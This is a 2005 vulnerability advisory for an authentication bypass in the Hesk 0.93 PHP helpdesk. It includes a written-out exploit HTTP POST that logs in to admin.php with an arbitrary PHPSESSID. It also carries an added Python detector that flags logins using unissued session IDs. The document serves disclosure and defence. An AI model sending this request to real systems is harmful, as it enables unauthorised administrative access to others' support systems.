Hesk Session ID Validation Vulnerability
OS2A ID: OS2A_1003
Status:
9/13/2005 Issue Discovered
9/14/2005 Reported to the vendor
9/18/2005 Patch Released
9/20/2005 Advisory Released
Class: Authentication Bypass
Severity: CRITICAL
Overview: Hesk is a PHP-based help desk application that runs with a MySQL database. It is used to set up a ticket-based support system (helpdesk) for websites. Hesk versions 0.93 and prior are vulnerable to authentication bypass and path disclosure caused by improper validation of the HTTP header. These vulnerabilities can be exploited to bypass the authentication mechanism and to reveal system-specific information.
Description: Multiple vulnerabilities exist in the Hesk ticket-based support system.
This is similar to a previously reported vulnerability where invalid User ID and Password were submitted. In this case, a randomly chosen Session ID is sent along with the login request.
Impact: Successful exploitation can result in a compromise of the application and disclosure of system-specific information.
Affected Systems: Hesk 0.93 and prior. Linux (Any), Unix (Any), Windows (Any)
Exploit:
1. HTTP POST request with randomly chosen Session ID:

POST admin.php + ("Host: host_ip
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7)
Accept: text/xml,application/xml,application/xhtml+xml,text/html
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://host_ip/hesk/admin.php
Cookie: PHPSESSID=12345 <!-- Random Session ID --!>
Content-Type: application/x-www-form-urlencoded
Content-Length: 26

user=1&pass=sdfd&a=do_login");
Solutions:
Patch: http://www.phpjunkyard.com/extras/hesk_0931_patch.zip
OR
Hesk 0.93.1 from http://www.phpjunkyard.com/free-helpdesk-software.php
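To find the request pattern described under Exploit in recorded traffic, the following added example (not part of the original advisory and not Hesk code) flags login POSTs that carry a PHPSESSID the server never issued in an earlier Set-Cookie. The record layout, field names and sample traffic are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample traffic (not from the advisory). The record fields
# (src, method, path, cookie, body, set_cookie) are a hypothetical log schema.
SAMPLE_EXCHANGES = [
    {"src": "192.0.2.10", "method": "GET", "path": "/hesk/admin.php",
     "cookie": "", "body": "",
     "set_cookie": "PHPSESSID=8f3a1c9e27b44d10a6c5e0f1b2d3c4a5; path=/"},
    {"src": "192.0.2.10", "method": "POST", "path": "/hesk/admin.php",
     "cookie": "PHPSESSID=8f3a1c9e27b44d10a6c5e0f1b2d3c4a5",
     "body": "user=1&pass=example&a=do_login", "set_cookie": ""},
    {"src": "198.51.100.7", "method": "POST", "path": "/hesk/admin.php",
     "cookie": "PHPSESSID=12345",
     "body": "user=1&pass=sdfd&a=do_login", "set_cookie": ""},
]

SESSION_RE = re.compile(r"(?:^|;\s*)PHPSESSID=([^;\s]+)")


def session_id(header):
    """Return the PHPSESSID value from a Cookie or Set-Cookie header, or None."""
    match = SESSION_RE.search(header or "")
    return match.group(1) if match else None


def find_unissued_session_logins(exchanges, login_script="admin.php"):
    """Flag login POSTs whose session ID the server never handed out."""
    issued, alerts = set(), []
    for ex in exchanges:
        form = parse_qs(ex.get("body", ""))
        is_login = (ex["method"] == "POST"
                    and urlsplit(ex["path"]).path.endswith(login_script)
                    and form.get("a") == ["do_login"])
        sid = session_id(ex.get("cookie"))
        if is_login and sid is not None and sid not in issued:
            alerts.append({"src": ex["src"], "session_id": sid,
                           "user": form.get("user", [""])[0]})
        # The response's Set-Cookie becomes valid only for later requests.
        issued_now = session_id(ex.get("set_cookie"))
        if issued_now:
            issued.add(issued_now)
    return alerts


if __name__ == "__main__":
    for alert in find_unissued_session_logins(SAMPLE_EXCHANGES):
        print("login with unissued session ID:", alert)
```

Session IDs issued before the start of the recorded window will also be flagged, so seed the issued set from the server's session store or treat early alerts as lower confidence.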
Credits: Rajesh Sethumadhavan, Rahul Mohandas, and Jayesh K.S of OS2A discovered the vulnerability.